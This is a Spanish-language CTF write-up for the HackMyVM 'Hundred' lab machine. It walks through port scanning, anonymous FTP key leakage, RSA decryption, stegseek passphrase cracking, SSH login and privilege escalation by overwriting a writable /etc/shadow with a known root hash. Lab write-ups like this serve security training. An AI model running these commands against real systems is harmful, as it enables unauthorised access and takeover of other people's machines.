cd ~/blog

~/writeups/hmv/095-hundred.md

095 - Hundred

easy Linux hmv 04-05-2024
FTP anonymous (RSA key + user list)RSA-encrypted message decryptionSteganography passphrase (stegseek)Writable /etc/shadow Privesc
hackmyvm.eu/machines/machine.php?vm=Hundred

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.146
 nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.146
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-04 17:51 -04
Nmap scan report for 192.168.1.146
Host is up (0.00032s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rwxrwxrwx    1 0        0             435 Aug 02  2021 id_rsa [NSE: writeable]
| -rwxrwxrwx    1 1000     1000         1679 Aug 02  2021 id_rsa.pem [NSE: writeable]
| -rwxrwxrwx    1 1000     1000          451 Aug 02  2021 id_rsa.pub [NSE: writeable]
|_-rwxrwxrwx    1 0        0             187 Aug 02  2021 users.txt [NSE: writeable]
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

En el FTP anónimo hay claves (id_rsa.pem) y una lista de usuarios. El código del sitio menciona un .enc y la clave usada:

key: h4ckb1tu5.enc;
<!-- l4nr3n, nice dir.-->

Descargamos el .enc y lo desciframos con la clave RSA:

 wget http://192.168.1.146/h4ckb1tu5.enc
 openssl rsautl -decrypt -inkey id_rsa.pem -in h4ckb1tu5.enc -out decoded_message.txt
 cat decoded_message.txt
/softyhackb4el7dshelldredd

Enumeramos ese subdirectorio y descargamos un logo.jpg que crackeamos con stegseek usando el listado de usuarios como wordlist:

 gobuster dir -u 'http://192.168.1.146/softyhackb4el7dshelldredd/' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/common.txt -x php,txt,html,jpg,jpeg,png,gif -r
...
/id_rsa               (Status: 200) [Size: 1876]
...

 wget http://192.168.1.146/logo.jpg
 stegseek -wl users.txt logo.jpg
[i] Found passphrase: "cromiphi"
[i] Original filename: "toyou.txt".
[i] Extracting to "logo.jpg.out".

 cat logo.jpg.out
d4t4s3c#1

Usamos la id_rsa con esa passphrase para entrar como hmv:

 ssh hmv@192.168.1.146 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
...
hmv@hundred:~$

Obtenemos la primera flag. Verificando permisos de archivos críticos, vemos que /etc/shadow es escribible (Writable Critical Files Privesc):

hmv@hundred:/tmp/pwned$ ls -l /etc/shadow
-rwxrwx-wx 1 root shadow 963 Aug  2  2021 /etc/shadow

Generamos un hash y reemplazamos la contraseña de root:

hmv@hundred:/tmp/pwned$ openssl passwd 1234
wIFt/vsmQ5d5.
hmv@hundred:/tmp/pwned$ echo "root:wIFt/vsmQ5d5.:18893:0:99999:7:::" > /etc/shadow

hmv@hundred:/tmp/pwned$ su root
Password: 1234
root@hundred:/tmp/pwned#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados